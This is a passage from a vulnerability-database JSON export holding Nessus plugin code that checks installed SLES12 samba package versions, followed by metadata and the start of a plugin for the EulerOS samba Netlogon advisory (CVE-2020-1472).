reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:48", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2181.NASL", "href": "https://www.tenable.com/plugins/nessus/141331", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141331);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2181\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6b24497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", 